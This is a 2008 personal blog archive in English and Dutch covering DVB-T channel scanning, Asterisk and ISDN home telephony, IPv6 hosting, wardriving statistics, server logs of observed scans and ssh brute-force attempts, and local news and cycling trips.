initial transponder 706000000 0 1 9 3 1 3 0
>>> tune to: 706000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_AUTO:QAM_64:TRANSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE
Network Name 'Digitenne'
0x0000 0x044d: pmt_pid 0x1b62 Digitenne -- Nederland 1 (running)
0x0000 0x044e: pmt_pid 0x1b6c Digitenne -- Nederland 2 (running)

.. somehow it knows the other frequencies and keeps on going:

retrying with f=818000000
>>> tune to: 818000000:INVERSION_AUTO:BANDWIDTH_8_MHZ:FEC_1_2:FEC_1_2:QAM_64:TRA
NSMISSION_MODE_8K:GUARD_INTERVAL_1_4:HIERARCHY_NONE (tuning failed)
0x08a3 0x000b: pmt_pid 0x03f2 Digitenne -- RTL 4 (running, scrambled)
0x08a3 0x000c: pmt_pid 0x03fc Digitenne -- RTL 5 (running, scrambled)

Eventually finding 38 services. When I set up /usr/share/doc/dvb-utils/examples/scan/dvb-t/nl-Utrecht with all the known transmitters, like

# Digitenne (Utrecht / Maarssen / Lopik / Amersfoort, The Netherlands)
# T freq bw fec_hi fec_lo mod transmission-mode guard-interval hierarchy
T 706000000 8MHz 1/2 NONE QAM64 8k 1/4 NONE
T 818000000 8MHz 1/2 NONE QAM64 8k 1/4 NONE
T 762000000 8MHz 1/2 NONE QAM64 8k 1/4 NONE
T 498000000 8MHz 1/2 NONE QAM64 8k 1/4 NONE

It still finds nothing on 498 MHz, strangely enough. I don't get 'tuning failed' but I do get errors from the pid filters.
The only thing failing at the moment is the remote: I can't find the right settings for lirc yet. But I haven't tried very hard.

Anyway: digital TV. It works!
Minor update: I learned using dvbsnoop that the 'somehow it knows the other frequencies' comes from the fact that the list of frequencies is included in the DVB standard as the Network Information Table (NIT).
Update 2008-12-18: I found the error correcting rates for two transmitters were wrong, fixed in the DVB experiments page.

Recently my interest in digital video broadcasting was tickled, so I started reading about it again. With television I usually have this 'the technical side is interesting but the content is not interesting' opinion so I am not going to buy a satellite dish at home yet. My ideas on what I want to play with and where are now documented at my DVB experiments page. I did order a simple free-to-air capable dvb-t usb stick so I can play with it. When I get bored with the subject again it's still a way to get some TV news should the cable fail or on the road.

Making those maps for the DVB experiments page was quite a bit more work than expected. I hoped to simply use openstreetmap maps and put some extra points in those but that was harder than expected. I tried gpsdrive but it can't just download openstreetmap street maps. It does have some openstreetmap support but if I get it correctly I'll have to install the whole mapnik program suite first. I skipped that for now. What I did was download maps from openstreetmap using gpsmap from kismet and import those in gpsdrive. Well, the gpsdrive import did not work correctly but I just put the right numbers in map_koord.txt. The waypoints for the transmitters al came from the German Bundesnetzagentur. Being very German and therefore very gründlich (thorough): they list all the active DVB transmitters for all surrounding countries, even where the chance of actual interference is quite small, like Den Burg on Texel in the Netherlands or Viborg in Denmark. With the maps with the transmitters as waypoints shown in gpsdrive I made some screenshots used on the page, with some lightbox 2 sprinkled on top for nice viewing.

New record in ntp.cs.uu.nl traffic: 2429 packets/second of ntp traffic. At that level the server does seem to miss some traffic: according to the pool.ntp.org: Stats for 131.211.84.189 it missed one request from the monitoring system completely, which drops the score several points at once.

Wardriving results 5 - 9 December: 2311 new networks with GPS locations. I'm back at number 17 in the WiGLE stats. Not many days but a few long rides happened in those days and an error in uploading making the oldest results nearly scrolling away from the upload stats.

New weirdness in the system logs: dns queries for names that resolve to nearby IP addresses. At home, an xs4all IP:

Dec  7 08:51:34 gosper named[877]: denied query from [79.111.252.228].4233 for "luna.vulcan.nu" A/IN
Dec  7 08:51:34 gosper named[877]: denied query from [79.111.252.228].4235 for "zuul.xs4all.nl" A/IN
Dec  9 11:42:11 gosper named[877]: denied query from [212.46.197.83].54183 for "luna.vulcan.nu" A/IN
Dec  9 11:42:11 gosper named[877]: denied query from [212.46.197.83].54187 for "zuul.xs4all.nl" A/IN

Both names resolve to xs4all IPs in the same block as my home IP. On a resolver at work:

Dec 09 19:31:01.372 security: info: client 208.37.177.62#46262: query(cache) 'ns.uu.nl/IN' denied
Dec 09 19:45:57.494 security: info: client 204.11.51.61#43318: query(cache) 'ns.uu.nl/IN' denied

either coincidence or signs of some form of searching for security holes. In todays Internet I always assume the latter.

Ik was aan het zoeken naar informatie over en aanbieders van een 'voet' om een satelliet ontvangst schotel op een plat dak te kunnen plaatsen. Niet voor thuis, maar omdat er voor een onderzoeks project op het werk vraag is naar een satelliet schotel.
Opvallend is hoe ik veel en veel meer informatie vind over gemeentes die een Mening hebben over satellietschotels dan over aanbieders van spullen om het goed te doen. Er is een enorme aversie tegen schotelantennes in het straatbeeld. Eigenlijk zijn een beetje de jaren 70 terug toen gemeentes bepaalden dat hun kabelnet de antennes op het dak overbodig maakten, nu willen gemeentes geen schotelantennes in het straatbeeld. De genoemde reden is altijd dat het er slecht uitziet maar het gaat volgens mij om de associatie met bepaalde bevolkingsgroepen (alleen dat noemen is discriminatie, dus gemeentes doen iets aan het symptoom schotelantenne).

Mijn persoonlijke visie is dat de vrijheid van informatievergaring een veel belangrijker grondrecht is dan de wens om niet tegen zaken aan te kijken die niet bevallen. Gelukkig is het Europese verdrag van de rechten van de mens het met me eens en wordt dit nogal eens gebruikt om al te strenge regels of zelfs belastingen op schotelantennes aan te vechten, op zowel 'vrijheid van informatiegaring' als 'vrij verkeer van diensten'.

Op onze vakantie in Denemarken viel het me op hoe normaal schotelantennes daar zijn, ook in gebieden waar kabel een alternatief was. Dat had niets te maken met bepaalde bevolkingsgroepen maar gewoon met de wens meer of andere keuze te hebben aan televisie-content dan geboden via de ether of kabelnet.

Geinspireerd door de zeer uitgebreide collectie bij de UK broadcast transmission gallery heb ik besloten zelf ook wat foto's die ik gemaakt heb van broadcast zenders publiek on-line te zetten. Gelijk is dan ook de uitdaging om meer van deze masten te fotograferen en goeie foto's er van beschikbaar te maken.
Mijn foto's van zendmasten.

Wardriving results 7 November - 4 December: 591 new networks with GPS locations. Still at 18 in the WiGLE stats although I am slowly creeping up on number 17.

Bij een opruimactie kwam ik een doos tegen met 'BBS' er op. Veel papier er in wat toch echt wegkon (rekeningen van walnut creek cdrom). Uitgeprinte mailtjes van wilde ideeën voor het BBS zoals een fax naar Amerika gateway. Maar het mooiste was wel de kerstkaart die we voor het BBS gemaakt hebben in December 1993. Die bewaar ik wel, en de kaart is nu ook on-line te bewonderen. Natuurlijk is de geschiedenis van BBS Koos z'n Doos bijgewerkt met de nieuwe feiten die ik kon halen uit dingen die ik tegen kwam.

Something that got my attention recently: the Dundee satellite receiving station offers access to weather satellite images. Using big dish antennas you can follow via webcam high-resolution images are captured from the weather satellites. The free images are relatively low-resolution (still filling the screen) but it is a nice enough resolution to get a view of the weather over Europe and see low-pressure areas develop.

Stuff computers are better at: shutting down at the wanted time. Just a simple:

root@hostname:~# at 23:01
warning: commands will be executed using /bin/sh
at> shutdown -h now
at> <EOT>
job 3 at Mon Dec  1 23:01:00 2008
root@hostname:~# 

The <EOT> was were I pressed ctrl-d. You might say "why not shutdown -h 23:01 ?". Well, your users will be bothered by the announcements between now and the shutdown time.

Linux Foundation Workgroup Tackles Federal Mandate for Next-Generation Internet Protocol. It seems there were parts of (some) Linux distributions not IPv6 compliant enough for the US DoD (Department of Defense) mandate, and now they are. Good news for Linux implementations. Modern microsoft implementations (XP, Vista) will be at the same level.

Good news for IPv6 mainly: the department of defense is a serious buyer of network hardware and software. Mandating IPv6 compliance for everything means hardware producers and software producers get a big push to implement and actually test IPv6.

Somehow the style of the announcement and the list of vendor names reminds me of the whole y2k craze.

Loads and loads of spam for 'Canadian Pharmacy'. Spam rates are in messages per hour. I noticed that the sending machines are almost all in south-america and the sites pointed at seem to live at IPs in China. But with very short TTL values so they can change any minute. Literally:

;; ANSWER SECTION:
currentneighbor.com.    60      IN      A       203.93.208.87

Other standards like valid SOA records and stuff like that aren't needed, potential customers just have to be able to reach the spamvertised site. I haven't seen a lot of IPs (yet). All running nginx, the choice of spammers and virus-spreaders. Or rather guided by language: the documentation for nginx is in russian so that part of the cybercriminals of this world can read it. Since nginx can do a lot with proxying I guess there is just a proxy at that IP pointing somewhere else where the real processing happens (or maybe that just goes to another proxy). I received 94 of these spams in the last 2 days (sofar). I can't imagine anybody receiving this not seeing that this must be some kind of scam.

The US has been rick-rolled. Thoroughly. The Macy's thanksgiving day parade, one of the things a lot of people watch on TV in the US featured Rick Ashley with an unexpected Rick-Roll. NBC does not make it over here, but irc lightened up with remarks about it.
Web sources: Thanks for the Rickroll, NBC (Average Dudes), Macy's Thanksgiving Day Parade Gets Rick Rolled (YouTube). Not too great video quality, but it shows the timing of the joke nicely.

Noted at AMS-IX breaks a gig by Derek Morr: Living with IPv6: The AMS-IX, Amsterdam Internet Exchange has broken the barrier of 1 gigabit/second IPv6 traffic. Their total traffic is at 564 gigabit/second but this is still a nice peak in IPv6 traffic.

I'm seeing traces of a massive and coordinated ssh dictionary attack. Talking on irc and checking usenet about it shows the same names being tried at the same time in the US, England and Japan, and mentioned IPs also showing up at other times on hosts. For example, from two hosts with adjacent IPs:

Nov 26 14:52:16 idefix sshd[63866]: Illegal user cleopatra from 85.207.120.188
Nov 26 14:52:16 idefix sshd[63866]: Failed unknown for illegal user cleopatra from 85.207.120.188 port 55938 ssh2

Nov 26 14:52:16 web-3 sshd[63867]: Illegal user cleopatra from 85.207.120.188
Nov 26 14:52:16 web-3 sshd[63867]: Failed unknown for illegal user cleopatra from 85.207.120.188 port 55939 ssh2

One funky botnet at work? Trying to find unix boxes for mischief?

A web search yields more mention of the IP above at What is with the script kiddies tonight??.

Het panopticon dook vandaag op voor het gebouw waar ik werk: bewakings camera's gemonteerd aan een lantaarnpaal met spanbanden en duct-tape. Twee standaard camera's in tegenovergestelde richtingen over de bus baan (met op het oog infrarood schijnwerpers) en twee dome camera's (die dus rond kunnen draaien). Ik vroeg aan de man die bezig was met de installatie of de camera's van de gemeente waren en het bleek om een stiptheidsmeting van de bussen te gaan. Ik vraag me af hoe effectief een stiptheidsmeting is als er een stel zeer zichtbare camera's voor geinstalleerd worden. En ik vraag me ook af of dome camera's daarvoor helpen.

First winter weather of this season: it snowed in large parts of the Netherlands yesterday. As a result the number of visitors to webcam.idefix.net quadrupled. Most interesting new link to this webcam I found was an Italian site about the Netherlands where I think they describe it as a view of a palace. No, it's just a university building.

A busy weekend filled with being available to fix the network for Nwerc 2008. But the network decided to behave and most of the work was just in making all the computers return to their normal state as soon as the competition was over. Funny how thoroughly re-imaging all the systems helps availability: this morning we have a 100% availability of student computers. That does not happen very often: 86 computers with an issue where they shutdown their network card from time to time will usually show a few missing ones.

The other thing I managed to find some time for was work on the new home server greenblatt. In the previous week I spent some evenings migrating all my nameservices to a new configuration where the old homeserver is primary and I duplicated this structure to greenblatt so this stuff will keep running once I swap systems. In the weekend I copied and tested all the configs for web sites running at home such as webcam.idefix.net. Lots of little details show up in the configs which don't work out of the box. I do use the ubuntu package for apache2 now because everything I want in a webserver is available in the package. And trying to squeeze the last bit of optimization from it is not necessary with gigahertzes plenty and upstream bandwidth probably the first bottleneck.

I just noticed that XS4ALL has a first service with a published IPv6 address without using .ipv6. in the name.

$ host -t any resolver.xs4all.nl
resolver.xs4all.nl has AAAA address 2001:888:0:6::66
resolver.xs4all.nl has AAAA address 2001:888:0:9::99
resolver.xs4all.nl has address 194.109.9.99
resolver.xs4all.nl has address 194.109.6.66
resolver.xs4all.nl has address 194.109.104.104

Resolving is one thing which will either break completely when there is an IPv6 connectivy problem or work fine with or without. So this is a 'safe' service to start with.

End of an era: I noticed today that the METAR for EHSB (Soesterberg) wasn't updated anymore. The last one I found:

2008/11/20 09:25
EHSB 200925Z AUTO 28014KT 9999 // 11/09 Q1010

The Soesterberg Wolfhounds were already gone but now all normal flying seems to be terminated and the meteorologist has stopped.

Happy birthday: 20 years of Internet in the Netherlands. Given the fact that I first experienced hands-on Internet at a traineeship at FOM Rijnhuizen in 1991 I thought Internet for research networks in the Netherlands were older. But the push to use committee-standards based X.25 networks was very strong in the Netherlands (and in the rest of Europe) which held back TCP/IP for a while. I remember working at Cetis when the Hogeschool had Internet access and still hearing people talk about grant proposals to be read by the European Union directorate on telecommunications and regulations (DG-XIII) making sure there was absolutely no mention of "Internet" or "TCP/IP" in those proposals but generic terms like "a telecommunications network" so the DG-XIII wouldn't deny them right away because "Internet" was America-centric.

Ook ik kreeg een stembiljet voor de waterschaps verkiezingen. Met keurig alle controlenummers er op en de mededeling dat ik mijn geboortedatum moet invullen omdat anders mijn stem ongeldig is. Mijn conclusie: er moet dus heel duidelijk een controleerbare link zijn tussen mijn stem en mijn identiteit. Zo werkt het stemgeheim vooral niet, en dat is ook waar de actiegroep wij vertrouwen stemcomputers niet bezwaar tegen heeft gemaakt. Als ik niet stem telt dat voor het waterschap natuurlijk als 'niet geinterreseerd'. Ik stem blanco: het enige wat ik veilig kan stemmen als terug te vinden is wie wat stemt.

Ik was op zoek naar een hosting oplossing. Mijn wensen zijn simpel: Linux debian of ubuntu, 512 Mb memory, 10G disk, 10G traffic/maand, root access, 1 IPv4 IP. De gemiddelde VPS aanbieding past daar prima bij. Maar.. een ding verandert de zaak: ik wil ook ipv6. Liefst native. Als voorstander van ipv6 moet ik natuurlijk ook zelf een keer zorgen dat het geheel via ipv6 bereikbaar wordt. De enige die ik vond die het native ondersteund is ShockMedia maar die zitten voor mijn wensen net op een onhandige plek: 256 Mb of 768 Mb geheugen en 5G of 50G per maand traffic. Ga ik toch van 35 euro/maand naar 70 euro/maand (vast ex btw).

Ik zou het wel kunnen oplossen met een ipv6 tunnel maar dat moet dan maar net weer samenwerken met het door de hoster gekozen virtualisatie pakket. Vaak is daarvoor medewerking nodig van de beheerder van de fysieke server, en bij een budgethoster verwacht ik eigenlijk ook niet dat ze dit soort specials ondersteunen.

Met een eigen server is dat probleem weer wat minder maar dan wordt het geheel weer wat prijzig.
Allemaal afwegingen. VPS hosters zijn niet zo makkelijk te vinden in Nederland, misschien zie ik er een over het hoofd die dit allemaal wel heeft.
Update: Ze zijn er wel: aanbieders van VPS hosting met ipv6 support, na zoeken en wachten op wat vragen aan diverse sales afdelingen:

• XLS Hosting vraag naar ipv6 aangeven bij aanvraag vps.
• Eliveld Networks B.V. de hele VPS optie staat momenteel niet op de site maar is er wel
• BudgetDedicated.com ipv6 aangeven op het aanvraagformulier of later zelf aanzetten.

Update: Maar het hele hosting idee gaat niet door, ik blijf alles thuis draaien op de eigen thuisserver greenblatt met IPv4 en IPv6 van xs4all.

Volgens een artikel in Ouders Online over het electronisch patienten dossier (EPD) is er ook nog een interresante link tussen de bouwers van het 'Schakelpunt' voor het electronisch patienten dossier, CSC Computer Sciences en de amerikaanse NSA. Ik moet me dus niet alleen zorgen maken over misbruik door de nederlandse justitie en veiligheidsdienst maar ook over misbruik door de amerikaanse veiligheidsdiensten.

Wardriving results 30 October - 6 November: 1617 new networks with GPS locations.

Henk van de Kamer is ondubbelzinnig over het electronisch patienten dossier. Ik heb geen brief gezien dus ik vrees dat'ie ook aangezien is voor reclame. Tijd om zelf ook een bezwaarschrift epd in te dienen. Als er een voorbeeld is van de enige manier om informatie echt blijvend te beschermen tegen alle vormen van misbruik is deze niet te verzamelen dan is het wel het epd (electronisch patienten dossier).

Ik vertel liever aan een behandelend arts in persoon welke allergieën ik heb en niet heb dan dat dit uit een computersysteem moet komen waarin gegevens niet volgens standaarden uitgewisseld worden. Zoals Henk ook aangeeft: de gebruikers zullen teveel denken dat omdat het uit de computer komt het allemaal klopt. En deze gegevens uitwisseling is veel te interresant voor misbruik zoals inzage door werkgevers, verzekeringen, politie of 'veiligheids' diensten dus er zal misbruik komen. Om dit veilig uit te wisselen moet je een netwerk opzetten van militaire proporties en met militaire procedures voor versleuteling en toegangscontrole. Ik verwacht niet dat mensen in de zorg die niet zo bekend staan als veilig omgaand met gegevens en computersystemen ineens het militaire niveau van computer beveiliging gaan gebruiken.

En het is natuurlijk ook waanzin dat ook dit er weer doorgeduwt wordt voor er politieke overeenstemming over is.

In een reactie op Bewoners zorgggroep[sic] tegen UMTS mast staat een reactie van stopumts.nl. Zo te zien een volledige automatische reactie die ze onder elk bericht over UMTS plakken. Ik schoot wel even in de lach over de "Ongesubsidieerd en Onafhankelijk." bewering van stopumts. Ongesubsidieerd vast, maar een entiteit die elke discussie over antennes probeert dood te slaan met hun visie 'onafhankelijk' noemen is nogal lachwekkend. Probeer eens 'vooringenomen'.

When the heating started working for winter I noticed that the crawl space temperature was going up in the same patterns as the living room temperature. It looked like the whole crawl space was heated. I already wondered about the relation between crawl space temperature and heating up the room back in September. So the results are in: Not really necessary and costing us money. I looked in the crawl space and noticed that there is a really long set of heating pipes from the back of the house to the front (over 8 meters long). This has to do with the old design: the first central heating was in the shed in the garden. The long pipes pass within a meter of the temperature sensor. So I put pipe isolation on the long run, now to check the graphs for improvement.

Eind jaren 80 en begin jaren 90 keek ik graag naar de WDR computerclub. Wolfgang en Wolfgang waren een beetje aan het hobbyen met computers en maakten daar TV van. Ik herinner me nog een uitzending waarin Wolfgang Back vertelde dat'ie voor de 4e keer een computer opgeblazen had in de voorbereiding van het programma. Sinds ik in Utrecht woon (1997) moet ik het zonder WDR doen (zit niet meer op de analoge kabel, een vaag grieks kanaal schijnt belangrijker te zijn en Ziggo gaat gewoon het analoge pakket krimpen voor meer digitale kanalen in dezelfde ruimte) dus heb ik het sindsdien niet meer gezien. Het programma op de WDR tv is op 22 februari 2003 gestopt.

Naar aanleiding van wat andere WDR dingen die ik ergens zag zocht ik vandaag even op 'WDR computerclub' en kwam toen tegen hoe het er mee gaat: De heren zijn in Juli 2006 weer begonnen. Eerst met een 'audio sendung' (podcast) en daarnaast later weer terug op tv op een regionale zender in Duitsland. En een website om het geheel te ondersteunen Computer:club 2 waar ook de tv uitzendingen terug te zien zijn. Ooit on-line met de 'Komcom' (Kommunikations Computer, een BBS) maar ze hebben het web omarmt (ze hadden de eerste website van de WDR). Ze zien er nu wat ouder uit (eigenlijk waren ze pensioen gerechtigd) maar hobbyen voor de camera kunnen ze niet laten. Hun sterke meningen zijn er ook niet minder sterk op geworden (en dankzij het web kunnen ze die nu nog makkelijker uiten). En er zijn nog steeds heel veel luisteraars en kijkers voor.

Het blijft duitstalig, en daar krijg ik niet altijd alle nuances van mee. Maar het is leuk om ze weer eens te horen/zien.

Met al het testen van ISDN opties zou het wel handig zijn om een ISDN toestel met display te hebben. Iemand toevallig eentje in de aanbieding voor niet al te veel? Of ruilen voor een Sun Sparcstation 20 of Ultra-1.

Sunday evening I finally had time to look at the new home server greenblatt and I tried to get the sitecom dc-105 isdn card in NT (network termination) mode connected to the fixed line (outside) isdn port of the fritz!box 7170. It took a bit of work as a lot of documentation about the mISDN drivers mentions NT mode but the needed cable isn't very well documented. I finally found it, chapter 2.2 of the PBX4Linux manual. By itself the crossed cable did not work (and the fritz!box is good at diagnosing problems with SIP dialing, but just goes 'meh' when ISDN dialing fails). I didn't need the fancy solution with power, but I had to look for a while for termination resistors. I remembered the sitecom dc-105 isdn card had some jumpers near the ISDN port. Those are indeed 100 ohm ISDN termination resistors. Nowhere to be found in any of the manuals of the dc-105 online.

After setting those jumpers it all started working. At first the dialtone sounded weird but that was caused by

[general]
country=us

in indications.conf. Changing this to

[general]
country=nl

made it suddenly sound a lot more familiar: KPN style. Now the test calls are running again via the modem connected to the fritz!box.
Conclusion: the jumpers on the sitecom dc-105 are isdn termination jumpers and can help to make an NT mode cross cable work.

Zaterdag was de bijeenkomst van de netwerkgroep waar we het gehad hebben over de HCC dagen en de jaarplanning van 2009. De HCC dagen (of eigenlijk: Het Multimedia Event 2008 ondertitel HCC dagen) zullen zeker anders zijn dan voorgaande jaren.

I have done serious testing of the mISDN drivers. Sofar in TE mode (terminal equipment). Ingredients for testing were an analog phone and analog modem connected to a fritzbox connected to the ISDN card and another asterisk testserver quite willing to play hours of music on hold or very short answers to calls. The fritzbox does not have the built-in answering machine I expected but the modem was also very good in dialing out on command (I had to dig up how to make cu dial in to another system again) or in listening for a ring, answering the phone and giving it up after a while. The driver worked, in the first few hours of testing I saw 2 spurious kernel messages. What I am worried about is the memory use, I think it slowly leaks kernel memory.

Tomorrow I'll be at the meeting of the network group which means the other test Asterisk server will be unavailable anyway. After I return I'll have a look at changing the setup to NT mode and see how things work then.

My favourite waste of time is back on-line: bash.org.

Wardriving results 17 - 29 October: 881 new networks with GPS locations. I'm still at 18 in the WiGLE stats. It's getting a bit cold for big planned wardriving trips by bicycle.

En licht was er! De eerste terugrit van mijn werk na het einde van de zomertijd was dus gelijk in het donker. De lamp werkte prima en gaf goed zicht zowel in gebieden met veel verlichting als op de donkere stukken.

I just realised I have the hardware (I think) for some serious call handling testing: the 7170 fritz!box as TE connected to the ISDN card with mISDN drivers in NT mode. The 7170 has a built-in answering machine (either by default or after upgrading to experimental firmware). Using the auto-calling features of Asterisk I could just constantly setup calls and either let the caller hang up (terminate call while the answering machine still holds the line) or let the called party hang up (let the answering machine hang up) and see what happens. Originating calls on the other side (not asterisk) is also not too complicated: just hook up a modem to the analog port of the fritz!box and a few well-placed ATDT strings should do the trick.

Actual time this weekend to work on the new home server greenblatt. I'm seriously looking at setting up this server as Asterisk server to run our home telephony completely. I bought a Sitecom DC-105 ISDN card that can run in NT mode. I tested the mISDN linux drivers and after some iterations I found the working combination for getting a working drivers without a kernel panic. To thoroughly test them I'm running it at the moment in TE (terminal equipment) mode. A test call is set up analog phone → fritzbox → isdn → isdn card → mISDN driver → Asterisk 1.4 → SIP → another Asterisk. The first call was to a SIP phone connected to that Asterisk but for a longterm torture test I connected it to a very irritating music on hold channel. So both the driver gets a torture and the eventual listener. After three hours of music-on-hold I think the mISDN driver works. Now to find a way to test lots of call setups with the card in NT mode.

I first tried to use an external Asterisk but with all the competition for port 5060 on the external IP that was not working. One of those things were NAT shows its ugly head.

Flashback!
FW dropped: IN=eth0.2 OUT= MAC=00:1b:21:08:82:b8:00:0e:50:7c:14:2e:08:00 SRC=82.153.163.169 DST=82.95.196.202 LEN=60 TOS=0x00 PREC=0x00 TTL=56 ID=7653 DF PROTO=TCP SPT=4253 DPT=23 WINDOW=5808 RES=0x00 SYN URGP=0
Real telnet traffic!

The hardware for a new home server greenblatt arrived. I installed it in a somewhat older ATX case so it can run by itself. I selected Ubuntu 8.04 LTS Server 64 bit. Basic stuff is now set up, time for packages and configuration.

Inkomende gesprekken werken nu ook vanaf Budget Phone. Daarvoor was wel een beetje botte aanpak nodig: alles voor 5060/udp forwarden naar de fritz!box. Budgetphone heeft namenlijk 3 sip servers op verschillende lokaties:

koos@gosper:~$ host -t srv _sip._udp.budgetphone.nl
_sip._udp.budgetphone.nl SRV 0 0 5060 proxy.sipthor.net.
koos@gosper:~$ host -t a proxy.sipthor.net
proxy.sipthor.net has address 81.23.228.129
proxy.sipthor.net has address 85.17.186.7
proxy.sipthor.net has address 81.23.228.150

en een binnenkomend telefoongesprek kan van elk van de 3 servers komen, dus niet alleen van degene waar de SIP registratie was. Dus mijn firewall had zoiets van 'die ken ik niet' als de registratie naar een andere server gedaan was en negeerde de packets. Workaround: alle verkeer voor 5060/udp dan maar naar de fritz!box. Als ik dat zo zie is een asterisk op de routerPC die alles doorstuurt naar een fritz!box, een isdn kaart in NT-mode (zodat ik er een isdn toestel aan kan hangen) of een voip toestel aan de binnenkant op den duur toch handiger. Dan werken ook dialing rules voor regionale nummers en andere korte nummers bijvoorbeeld beter. Nummers als 112 en 18xx gaan nu nog via het vaste net (en ontlopen daarmee de vertaal-regel die er 030 voor zet) en het saldo-controle nummer van budgetphone (444) werkt nog uberhaupt niet.
Waarmee ik weer terug ben op de verbazing dat SIP+NAT uberhaupt werkt.

Ik heb een Budget Phone telefoonnummer en prepaid account aangevraagd om eens te proberen of dat een geschikte aanbieder is om onze telefonie naar toe over te zetten. Hun uitleg over installatie op de fritz!box is wat karig en we gebruiken (nog) een redelijk achterhaald model: de fritz!box 5012. We vinden het wel handig als lokale nummers in Utrecht zonder netnummer 030 gebeld kunnen worden dus was het even zoeken naar de juiste instellingen: vinkje 'Ortskennzahl verwenden' aan, bij 'Geben Sie hier Ihre Ortskennzahl ein' 30, bij 'Geben Sie hier Ihren Ortskennzahl-Prefix ein' 0 en vinkje 'Ortskennzahl-Prefix beibehalten' aan. Internationaal zoek ik een keer uit als ik daar noodzaak toe heb.

Wardriving results 2 - 16 October: 1917 new networks with GPS locations according to WiGLE. I dropped a place in the WiGLE stats because a really active wardriver (over 50000 new networks this month) overtook me.

En er is licht! Na mijn avonturen rond het herfsttreffen waarvan de heenrit grotendeels in het donker was dacht ik al over betere verlichting op mijn ligfiets. Dat werd erger toen ik een alternatieve route naar mijn werk ging fietsen die iets langer is maar een stuk beter opschiet (minder stoplichten en minder ander verkeer). Deze route loopt ook voor een serieus deel over onverlichte wegen.

Veel ligfietsers in Nederland, onder andere 'Knurft' zijn enthousiast over de Busch und Müller KG Ixon IQ die in de hoge stand 40 lux licht geeft. Dus heb ik ook in zo'n lamp geinvesteerd (80 euro! voor een koplamp). Nu nog in het donker fietsen.. maar dat gaat vanzelf lukken de komende tijd.

Ik heb wat gespeeld met guest SIP toegang tot een paar van de Asterisk demo projecten aan de hand van de uitleg in blyon.com: sip p2p dialing. Via SIP urls zoals sip:belspel@idefix.net is bijvoorbeeld het Asterisk belspel te bereiken zonder telefoonkosten. Werkt alleen met clients die SRV records voor SIP snappen.

British Telecoms 21st century network initiative dubbed 21CN isn't very 21st century: no IPv6 support. Bwahahaha. Sorry, I have to laugh about this. That's not very future proof. Back to the drawing board!
Source: The Register: BT's 21st Century network, er... isn't.

Ekiga is a nice softphone which I use under Ubuntu to test Asterisk stuff. But at home it never registered with an outside asterisk and I had weird missing audio problems with some services. With a lot of tcpdump use I found that the 169.254 addresses were used as source address for the SIP packets (and probably as destination for the missing audio packets). In the setup I selected the right interface for the outgoing connections and suddenly stuff works. This is something where I expect software like ekiga to do the right thing. You can't reach a non-169.254 address with that address as source, just use the normal routing tables.

Fast asterisk trick: dialing US toll free numbers using SIP. IPKall is nice enough to offer this without any needed registration. Given the 'european' way of dialing a US toll free number, 00-1-800-555-1212, you get:

exten => _001800XXXXXXX,1,Dial(SIP/${EXTEN:3}@voiper.ipkall.com)
exten => _001866XXXXXXX,1,Dial(SIP/${EXTEN:3}@voiper.ipkall.com)
exten => _001877XXXXXXX,1,Dial(SIP/${EXTEN:3}@voiper.ipkall.com)
exten => _001888XXXXXXX,1,Dial(SIP/${EXTEN:3}@voiper.ipkall.com)

Found at Voxilla forums: SIP to TFN (Toll Free Number)

Wardriving results 6 September - 1 October: 1339 new networks with GPS locations. Nothing spectacular happened, I just took the wardriving box along on a number of trips.

Het herfsttreffen van de nvhpv was dit weekend. Direct na het terugkomen van het Surf-IBO congres in Eindhoven konden we door op de ligfiets naar camping de Woensberg in Huizen. Onderweg kreeg ik ergens net buiten Hilversum een lekke achterband. De eerste lekke band met mijn ligfiets! Na wat gemopper deze geplakt en een groot stuk glas uit de buitenband verwijderd. We nemen de plakspullen niet vaak mee, deze keer toevallig wel. Daarna weer verder gefietst. In het donker, navigerend met de GPS die soms wel eens rare ideëen heeft over kortste route over verharde weg. Op het laatste stuk ging het regenen. De helling op richting de Woensberg begon mijn achterband weer af te zakken, dus het laatste stuk maar gelopen. Ik ging er eigenlijk van uit dat de vers geplakte band door het er in komen van regenwater weer losgelaten had, maar ik had toen niet zo heel veel zin meer om er naar te kijken, want ik had honger. We waren te laat voor de barbeque maar toch wat gegeten en daarna gekletst met de rest van de ligfietsers (altijd een gezellige groep met zeer verschillende achtergronden).

Zaterdagochtend eerst een geleende binnenband achter erin gezet en toen onderweg op de toertocht. Een echt mooie tocht door de omgeving met veel onverwachte mooie plekken er in. Maar, onderweg sloeg de pech ook bij mij weer toe: lekke voorband. Dankzij veel aanwezige helpende handen in een recordtijd de binnenband vervangen door een reserve binnenband van een collega fietser terwijl iemand anders nog eventjes de lekke band plakte omdat we nog op een andere reparatie stonden te wachten. Na de middagpauzestop met de rituele koffie met appeltaart ontdekte ik dat mijn achterband ook weer aan het afzakken was. De rest van de tocht deze een paar keer opgepompt om door te kunnen blijven rijden. Een paar keer er door andere rijders op gewezen dat mijn achterband erg zacht was. Ja dat wist ik al, ik wilde het plakken even uitstellen. Ook was het fietsen niet erg comfortabel omdat de binnenbanden beiden zorgden voor wat ongelijke plekken in mijn wiel.

Na terugkomst dus aan het plakken gegaan: de geleende binnenband van achter, toen ook maar de buitenband gecontroleerd en het gat van vrijdagavond aan de binnenkant van de buitenband geplakt. Daarna het 2e lek in de originele achter-binnenband. Dat bleek echt een nieuw gat te zijn, geen loszitten van de reparatie van vrijdagavond. Daarna had ik het wel een beetje gehad met banden plakken. Voor minstens een jaar ofzo. Gelukkig was er zaterdagavond een maaltijd verzorgd door de onvolprezen keukenhelden afgesloten met een Irish coffee (hips!) en een avond met meer gezelligheid en een snel verdampende fles wijn.

Zondag werd het steeds regenachtiger en was iedereen duidelijk moed aan het verzamelen voor de terugtocht. We zijn met een kleine delegatie teruggereden naar Utrecht via hoofdwegen, de bossen leken ons te modderig. Onderweg bleef het ook regenen dus thuis was het heel hoog tijd voor douche en droge kleren. In totaal over het weekend 4 keer een band lek gehad terwijl ik dat daarvoor nooit had met mijn ligfiets.

Een beetje een concentratie van pech en drukte zo dicht op elkaar. En toen keek ik zondagmiddag met een half oog in de krant en zag dat er sinds ons vertrek vrijdag een hoop wereldnieuws was gebeurt in Nederland.

Update: Foto's staan nu on-line, het artikel op ligfiets.net met meer verslagen en foto's.

